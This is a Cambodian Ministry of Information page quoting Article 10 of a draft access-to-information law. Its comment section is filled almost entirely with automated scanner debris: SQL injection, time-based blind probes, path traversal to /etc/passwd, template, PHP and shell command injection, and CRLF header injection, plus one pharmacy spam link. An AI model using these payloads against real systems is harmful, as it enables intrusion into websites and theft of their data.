សេចក្តីព្រាងច្បាប់សេចក្តីពីសិទ្ធិទទួលព័ត៌មាន

ជំពូកទី ៣ - នីតិវិធីស្នើសុំនិងផ្តល់ព័ត៌មាន - មាត្រា ១០

បុគ្គល​គ្រប់​រូប​ទោះ​ជារូបវន្ត​បុគ្គល​ ឬ​នីតិបុគ្គល​មាន​សិទិ្ធ​ស្នើ​សុំ​ព័ត៌មាន​​​ពី​ស្ថាប័ន​សាធារណៈ ​ដោយ​គ្មាន​ការ​រើស​អើង​។All Comments:
dobsonz
smithio34ga134@yahoo.com
yPC1KH http://pills2sale.com/ levitra nizagara

rcarwalwelregrogo@gmail.com
Crawlergo
C

rcarwalwelregrogo@gmail.com
Crawlergo
C

rcarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

rcarwalwelregrgoo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C'and/**/extractvalue(1,concat(char(126),md5(1337405674)))and'

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C"and/**/extractvalue(1,concat(char(126),md5(1608666001)))and"

crarwalwelregrogo@gmail.com
Crawlergo
C'and'b'='b

crarwalwelregrogo@gmail.com
Crawlergo
extractvalue(1,concat(char(126),md5(1340746768)))

crarwalwelregrogo@gmail.com
Crawlergo
C'and'q'='o

crarwalwelregrogo@gmail.com
Crawlergo
C'and(select'1'from/**/cast(md5(1994712775)as/**/int))>'0

crarwalwelregrogo@gmail.com
Crawlergo
C"and"a"="a

crarwalwelregrogo@gmail.com
Crawlergo
C/**/and/**/cast(md5('1549749201')as/**/int)>0

crarwalwelregrogo@gmail.com
Crawlergo
C"and"d"="e

crarwalwelregrogo@gmail.com
Crawlergo
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1697505738')))

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1147832210')))>'0

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C'and(select*from(select+sleep(2))a/**/union/**/select+1)='

crarwalwelregrogo@gmail.com
Crawlergo
C"and(select*from(select+sleep(0))a/**/union/**/select+1)="

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C'/**/and(select'1'from/**/pg_sleep(0))::text>'0

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C'/**/and(select'1'from/**/pg_sleep(2))::text>'0

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C'and(select+1)>0waitfor/**/delay'0:0:0

crarwalwelregrogo@gmail.com
Crawlergo
C'and(select+1)>0waitfor/**/delay'0:0:2

crarwalwelregrogo@gmail.com
Crawlergo
C'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com'and/**/extractvalue(1,concat(char(126),md5(1656992025)))and'
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com"and/**/extractvalue(1,concat(char(126),md5(1790535048)))and"
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com'and(select'1'from/**/cast(md5(1212217227)as/**/int))>'0
Crawlergo
C

crarwalwelregrogo@gmail.com/**/and/**/cast(md5('1566562962')as/**/int)>0
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com鎈'"\(
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo
C

crarwalwelregrogo@gmail.com'"\(
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo'and/**/extractvalue(1,concat(char(126),md5(1332333124)))and'
C

crarwalwelregrogo@gmail.com'and't'='t
Crawlergo
C

crarwalwelregrogo@gmail.com'and'e'='v
Crawlergo
C

crarwalwelregrogo@gmail.com
extractvalue(1,concat(char(126),md5(1797723627)))
C

crarwalwelregrogo@gmail.com"and"w"="w
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo'and(select'1'from/**/cast(md5(1658435481)as/**/int))>'0
C

crarwalwelregrogo@gmail.com"and"u"="o
Crawlergo
C

crarwalwelregrogo@gmail.com'and(select*from(select+sleep(2))a/**/union/**/select+1)='
Crawlergo
C

crarwalwelregrogo@gmail.com"and(select*from(select+sleep(0))a/**/union/**/select+1)="
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo鎈'"\(
C

crarwalwelregrogo@gmail.com"and(select*from(select+sleep(2))a/**/union/**/select+1)="
Crawlergo
C

crarwalwelregrogo@gmail.com'/**/and(select'1'from/**/pg_sleep(0))::text>'0
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo'"\(
C

crarwalwelregrogo@gmail.com'/**/and(select'1'from/**/pg_sleep(2))::text>'0
Crawlergo
C

crarwalwelregrogo@gmail.com
Crawlergo"and(select*from(select+sleep(0))a/**/union/**/select+1)="
C

crarwalwelregrogo@gmail.com
Crawlergo"and(select*from(select+sleep(2))a/**/union/**/select+1)="
C

crarwalwelregrogo@gmail.com
Crawlergo'/**/and(select'1'from/**/pg_sleep(0))::text>'0
C

crarwalwelregrogo@gmail.com
Crawlergo'/**/and(select'1'from/**/pg_sleep(2))::text>'0
C

crarwalwelregrogo@gmail.com
Crawlergo'and(select+1)>0waitfor/**/delay'0:0:0
C

crarwalwelregrogo@gmail.com
Crawlergo'and(select+1)>0waitfor/**/delay'0:0:2
C

crarwalwelregrogo@gmail.com
Crawlergo'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
C

crarwalwelregrogo@gmail.com
Crawlergo'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',2)='k
C

admin
123456
123456

../../../../../../../../../../../../../../../../../../etc/passwd
123456
123456

admin
123456
/*1*/{{991681415+919089904}}

admin
123456
123456

admin
123456
123456

admin
123456
123456

${@var_dump(md5(289754420))};
123456
123456

admin
123456
123456 expr 947862288 + 971016162

admin
123456
123456

admin
123456
${808963004+897583213}

../../../../../../../../../../../../../../../../../../etc/passwdadmin
123456
123456

admin
123456
123456

admin
123456
123456

admin
123456
123456|expr 817361621 + 891978406

'-var_dump(md5(293076840))-'
123456
123456

${978841889+958941010}
123456
123456 QPbmCRVM
sample@email.tst
555

admin
1
1

admin
1
1

admin
1
1 expr 863438143 + 872655349

${@var_dump(md5(525384898))};
1
1

admin
1
1|expr 809388285 + 839440828

admin
/*1*/{{963659408+870154784}}
1

'-var_dump(md5(190401956))-'
1
1

admin
1
1$(expr 805829196 + 881005556)

admin
fytlmiaiavqowftcjoya
1

admin
${854795990+876668116}
1

admin
${923043768+844594785}
1

admin
${@var_dump(md5(219532849))};
1

admin
1
1&set /A 871760837+891298802

admin
${(990103848+843673294)?c}
1

admin

1

admin
1
${900720287+899211626}

admin
'-var_dump(md5(600917560))-'
1

admin
1
1

admin
1
expr 817723233 + 910058372

admin
#set($c=979890913+837835177)${c}$c
1

admin

1

admin
1
1

admin
1 CRLF-Header:CRLF-Value
1

%{42974*40836}
1
1

admin
1
1

admin
1
${@var_dump(md5(934610161))};

admin
1
1

'+(44153*42110)+'
1
1

admin
1
1

admin
1
1

admin
1%0d%0aCRLF-Header:CRLF-Value
1

admin
<%- 883341046+963980032 %>
1

admin
1
fytlmiaiavqowftcjoya

${821123749+807157372}
1
1

admin
1
1

admin
%{41716*43114}
1

admin
1\r\nCRLF-Header:CRLF-Value
1

admin
1
'-var_dump(md5(964674632))-'

admin
1
1

admin
1
1

admin
'+(44131*43358)+'
1

admin
1
1 CRLF-Header:CRLF-Value

admin
1
1

admin
1
/*1*/{{903455917+849120044}}

admin
1


admin
1
1%0d%0aCRLF-Header:CRLF-Value

admin
1
%{43777*43326}

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
'+(42434*40335)+'

admin
1
1\r\nCRLF-Header:CRLF-Value

admin
1
1

admin
1
${954539506+974479251}

admin
1


admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1'and/**/extractvalue(1,concat(char(126),md5(1765895479)))and'

admin
1
1

admin
1
${(917079899+968545187)?c}

admin
1
1

admin
1
1

admin
1
1

admin
1
1"and/**/extractvalue(1,concat(char(126),md5(1432291548)))and"

admin
1
1

admin
1
#set($c=869630484+947625638)${c}$c

admin
1
1

admin
1
1

admin
1
extractvalue(1,concat(char(126),md5(1253034851)))

admin expr 828674320 + 944605289
1
1

admin
1
<%- 830010346+989299535 %>

admin
1
1

admin
(select*from(select+sleep(0)union/**/select+1)a)
1

admin
1
1

admin
(select*from(select+sleep(2)union/**/select+1)a)
1

admin
1
1'and(select'1'from/**/cast(md5(1198275848)as/**/int))>'0

admin|expr 971591586 + 992918075
1
1

admin
1
1

admin
1'and(select*from(select+sleep(0))a/**/union/**/select+1)='
1

admin
1'and(select*from(select+sleep(2))a/**/union/**/select+1)='
1

fytlmiaiavqowftcjoya
1
1

admin
1"and(select*from(select+sleep(0))a/**/union/**/select+1)="
1

admin
1
1/**/and/**/cast(md5('1567766943')as/**/int)>0

admin
1
1

admin$(expr 844635817 + 963036875)
1
1

admin
1
1

admin
1"and(select*from(select+sleep(2))a/**/union/**/select+1)="
1


1
1

admin
1/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
1

admin&set /A 999603125+800275821
1
1

admin
1/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
1

admin
1
1

admin
1
1

admin
1'/**/and(select'1'from/**/pg_sleep(0))>'0
1


1
1

admin
1
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1291872245')))

admin
1'/**/and(select'1'from/**/pg_sleep(2))>'0
1

expr 870288658 + 820509081
1
1

admin
1/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
1

admin
1
1

admin
1
1

admin
1/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
1

admin
1 expr 900751790 + 813076248
1

admin
1'and(select+1)>0waitfor/**/delay'0:0:0
1

admin
1
1

admin
1
1'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1278459236')))>'0

admin
1'and(select+1)>0waitfor/**/delay'0:0:2
1

admin
1
1

admin
1|expr 806388603 + 836351398
1

admin
1/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('n',0)
1

admin
1/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('d',2)
1

admin
1
1

admin
1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d
1

admin
1
1鎈'"\(

admin
1$(expr 939978083 + 965854213)
1

admin
1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',2)='e
1

admin
1
1

admin
1
(select*from(select+sleep(0)union/**/select+1)a)

admin
1
(select*from(select+sleep(2)union/**/select+1)a)

admin
1
1'"\(

admin
1&set /A 976653152+907280431
1

admin
1
1

/*1*/{{911838525+919417918}}
1
1

admin
1
1'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin
expr 997502685 + 953781466
1

admin
1
1

admin
1
1'and(select*from(select+sleep(2))a/**/union/**/select+1)='

${876400712+934625098}
1
1

admin
1
1"and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin
1
1

admin
1
1"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin
1
1

${(998963691+933340374)?c}
1
1

admin
1
1/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

admin
1
1

admin
1
1

admin
1
1/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

#set($c=991117713+900396443)${c}$c
1
1

admin
1
1'/**/and(select'1'from/**/pg_sleep(0))>'0

admin
1
1

admin
1
1

admin
1
1'/**/and(select'1'from/**/pg_sleep(2))>'0

admin
1
1/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

<%- 843169036+877616500 %>
1
1

admin
1
1/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

admin
1
1

admin
1
1'and(select+1)>0waitfor/**/delay'0:0:0

admin
1
1

admin
1
1'and(select+1)>0waitfor/**/delay'0:0:2

admin
1
1

admin
1
1/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('l',0)

admin
1
1/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('m',2)

admin
1
1

admin
1
1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',0)='n

admin
1
1

admin
1
1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin
1
1

admin'and/**/extractvalue(1,concat(char(126),md5(1410978215)))and'
1
1

admin
1
1

admin
1
1

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
1
1

admin"and/**/extractvalue(1,concat(char(126),md5(1710661319)))and"
1
1

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
1
1

admin
1
1

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
1
1

extractvalue(1,concat(char(126),md5(1703915704)))
1
1

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
1
1

admin'/**/and(select'1'from/**/pg_sleep(0))>'0
1
1

admin
1
1

admin'and(select'1'from/**/cast(md5(1129070061)as/**/int))>'0
1
1

admin'/**/and(select'1'from/**/pg_sleep(2))>'0
1
1

admin'and(select+1)>0waitfor/**/delay'0:0:0
1
1

admin
1
1

admin'and(select+1)>0waitfor/**/delay'0:0:2
1
1

admin/**/and/**/cast(md5('1261111145')as/**/int)>0
1
1

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z
1
1

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',2)='x
1
1

admin
1
1

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1870543540')))
1
1

admin
1
1

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1475543869')))>'0
1
1

admin
1
1

admin鎈'"\(
1
1

admin
1
1

admin'"\(
1
1

admin
1
1

admin
1'and/**/extractvalue(1,concat(char(126),md5(1143425500)))and'
1

admin
1
1

admin
1"and/**/extractvalue(1,concat(char(126),md5(1133610177)))and"
1

admin
1
1

admin
extractvalue(1,concat(char(126),md5(1037209582)))
1

admin
1
1

admin
1'and(select'1'from/**/cast(md5(1206954111)as/**/int))>'0
1

admin
1
1

admin
1/**/and/**/cast(md5('1012528708')as/**/int)>0
1

admin
1
1

admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1983447872')))
1

admin
1
1

admin
1'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1503919114')))>'0
1

Array
1
1

admin
1鎈'"\(
1

Array
1
1

admin
1'"\(
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

Array
1
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
Array
1

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array

admin
1
Array


Comment

ដៃគូសហប្រតិបត្តិការ

© Access to Information (Ministry of Information, Phnom Penh, Cambodia)

អាសយដ្ឋាន: លេខ៦២ មហាវិថីព្រះមុនីវង្ស សង្កាត់ស្រះចក ខណ្ឌដូនពេញ រាជធានីភ្នំពេញ
ទូរស័ព្ទលេខ (+855)23 430 514 ទូរសារលេខ (+855)23 430 514